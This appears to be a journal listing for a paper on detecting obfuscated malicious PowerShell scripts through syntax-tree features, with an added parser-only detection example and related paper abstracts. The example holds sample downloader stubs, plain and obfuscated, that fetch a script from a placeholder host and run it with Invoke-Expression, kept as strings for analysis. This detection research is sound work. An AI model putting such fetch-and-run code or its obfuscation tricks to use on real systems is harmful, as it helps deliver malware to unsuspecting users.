Search for malicious powershell scripts using syntax trees
Authors
Abstract
Purpose of the paper: to find a sufficiently abstract representation of PowerShell script functionality, built on syntax trees, such that a previously unseen obfuscated script can be detected provided that the malware it derives from is already known. Research method: analysis of obfuscation performed at three levels: token, string, and tree. Results: 1) simple AST-based features, such as the number of AST function nodes and their distribution by depth, together with a similarity distance computed from node positions in the tree, are sufficient to attribute scripts to the original script that was not subjected to obfuscation; 2) a method for building an extended data set, including the marking of source files, is described and implemented; 3) extensive [...] several [...] represent structure.
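The features the abstract names (node counts, the distribution of nodes by depth, and a distance derived from node positions) can be computed directly from the AST that PowerShell's own parser produces, without ever executing the script. The following is an added example written for this page, not the paper's code or data set: the three sample scripts are constructed, the download URL is a placeholder, and the total-variation distance over the normalised depth histogram is one reasonable choice of similarity measure, not necessarily the one the paper used. Because token-level obfuscation (variable renaming, random casing) does not change the tree at all, the token-obfuscated variant scores a distance of exactly 0 against the original; string obfuscation adds concatenation nodes and so moves the histogram slightly; an unrelated script moves it much further.

```powershell
# Added example (not from the paper): simple AST features for PowerShell scripts and a
# depth-distribution distance between two scripts. Parsing does not run the script, so
# this is safe to apply to suspected malware. All sample inputs below are constructed.

function Get-AstFeatures {
    param([Parameter(Mandatory)][string]$ScriptText)

    $tokens = $null
    $errors = $null
    $ast = [System.Management.Automation.Language.Parser]::ParseInput($ScriptText, [ref]$tokens, [ref]$errors)
    if ($errors.Count -gt 0) {
        throw ('Parse errors: ' + (($errors | ForEach-Object Message) -join '; '))
    }

    $depthHist = @{}   # depth -> number of AST nodes at that depth
    $nodeCount = 0
    $funcCount = 0     # FunctionDefinitionAst nodes
    $cmdCount  = 0     # CommandAst nodes (cmdlet, function and '&' invocations)

    foreach ($node in $ast.FindAll({ $true }, $true)) {
        $nodeCount++
        if ($node -is [System.Management.Automation.Language.FunctionDefinitionAst]) { $funcCount++ }
        if ($node -is [System.Management.Automation.Language.CommandAst])            { $cmdCount++ }

        # Depth = number of Parent links up to the root ScriptBlockAst (depth 0).
        $depth = 0
        $parent = $node.Parent
        while ($null -ne $parent) { $depth++; $parent = $parent.Parent }

        if ($depthHist.ContainsKey($depth)) { $depthHist[$depth]++ } else { $depthHist[$depth] = 1 }
    }

    [pscustomobject]@{
        TokenCount    = $tokens.Count
        NodeCount     = $nodeCount
        FunctionCount = $funcCount
        CommandCount  = $cmdCount
        DepthHist     = $depthHist
    }
}

function Get-DepthDistance {
    # Total-variation distance (0 = identical, 1 = disjoint) between two depth histograms,
    # each normalised by its total node count so scripts of different size are comparable.
    param([Parameter(Mandatory)][hashtable]$A, [Parameter(Mandatory)][hashtable]$B)
    $totalA = ($A.Values | Measure-Object -Sum).Sum
    $totalB = ($B.Values | Measure-Object -Sum).Sum
    $dist = 0.0
    foreach ($k in (@($A.Keys) + @($B.Keys) | Sort-Object -Unique)) {
        $pa = if ($A.ContainsKey($k)) { $A[$k] / $totalA } else { 0 }
        $pb = if ($B.ContainsKey($k)) { $B[$k] / $totalB } else { 0 }
        $dist += [math]::Abs($pa - $pb)
    }
    return $dist / 2
}

# Constructed sample: a downloader stub (placeholder URL, never executed here).
$Original = @'
$u = 'http://payload.invalid/stage2.ps1'
$wc = New-Object Net.WebClient
$s = $wc.DownloadString($u)
Invoke-Expression $s
'@

# Token obfuscation: renamed variables and random casing only. The AST is unchanged.
$TokenObfuscated = @'
${qZx} = 'http://payload.invalid/stage2.ps1'
${pLm} = nEw-oBjEcT Net.WebClient
${kWv} = ${pLm}.DownloadString(${qZx})
iNvOkE-eXpReSsIoN ${kWv}
'@

# String obfuscation: literals split and concatenated, command name assembled at run time.
# The extra BinaryExpression/ParenExpression nodes shift the depth distribution slightly.
$StringObfuscated = @'
${a} = ('http://pay' + 'load.invalid/sta' + 'ge2.ps1')
${b} = New-Object ('Net.' + 'WebClient')
${c} = ${b}.DownloadString(${a})
& ('Invoke-' + 'Expression') ${c}
'@

# Unrelated benign script, for contrast.
$Unrelated = @'
function Get-DiskReport {
    param([string]$Drive = 'C')
    Get-PSDrive -Name $Drive | Select-Object Name, Used, Free
}
Get-DiskReport
'@

$ref = Get-AstFeatures $Original
foreach ($case in @(
        @{ Name = 'token-obfuscated';  Text = $TokenObfuscated },
        @{ Name = 'string-obfuscated'; Text = $StringObfuscated },
        @{ Name = 'unrelated';         Text = $Unrelated })) {
    $f = Get-AstFeatures $case.Text
    $d = Get-DepthDistance $ref.DepthHist $f.DepthHist
    '{0,-17} tokens={1,3} nodes={2,3} commands={3} functions={4} depthDistance={5:N3}' -f $case.Name, $f.TokenCount, $f.NodeCount, $f.CommandCount, $f.FunctionCount, $d
}
```

Run the block as a script on Windows PowerShell 5.1 or PowerShell 7; only the parser is invoked, so the sample downloader is never executed. The caveat that motivates the paper's third obfuscation class is visible here: a tree-level obfuscator that inserts dead branches, splits statements into helper functions or reorders independent statements changes the depth histogram in a way that string and token obfuscation do not, so a threshold tuned on the first two classes will not transfer to the third without retuning.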
Similar papers
More Accurate Fuzzy Text Search for Languages Using Abugida Scripts
Text search is a key step in any kind of information access. For doing it effectively, we can use knowledge about the concerned writing systems. Methods based on such knowledge can give significantly better results for searching text, at least for some languages. This can improve information retrieval in particular and information access in general. In this paper, we present a method for fuzzy ...
Clone Detection Using Abstract Syntax Trees
Existing research suggests that a considerable fraction (5-10%) of the source code of large-scale computer programs is duplicate code (“clones”). Detection and removal of such clones promises decreased software maintenance costs of possibly the same magnitude. Previous work was limited to detection of either nearmisses differing only in single lexems, or near misses only between complete functi...
Computational Techniques for Inferring the Syntax of Un-deciphered Scripts
Understanding the syntax of an undeciphered writing is a significant challenge. This can provide important clues to the nature of writing and guide potential decipherments. Here we evaluate a set of computational tools that can help us address this problem. We show that significant aspects of the writing can be inferred through this approach without making any assumption about the underlying co...
Merkelized Abstract Syntax Trees
In the context of modern cryptosystems, a common theme is the creation of distributed trust networks. In most of these designs, permanent storage of a contract is required. However, permanent storage can become a major performance and cost bottleneck. As a result, good code compression schemes are a key factor in scaling these contract based cryptosystems. For this project, we formalize and imp...
Canonical Abstract Syntax Trees
This paper presents GOM, a language for describing abstract syntax trees and generating a Java implementation for those trees. GOM includes features allowing to specify and modify the interface of the data structure. These features provide in particular the capability to maintain the internal representation of data in canonical form with respect to a rewrite system. This explicitly guarantees t...
Journal
Journal title: Bezopasnost' informacionnyh tehnologij
Year: 2023
ISSN: ['2074-7128', '2074-7136']
DOI: https://doi.org/10.26583/bit.2023.3.05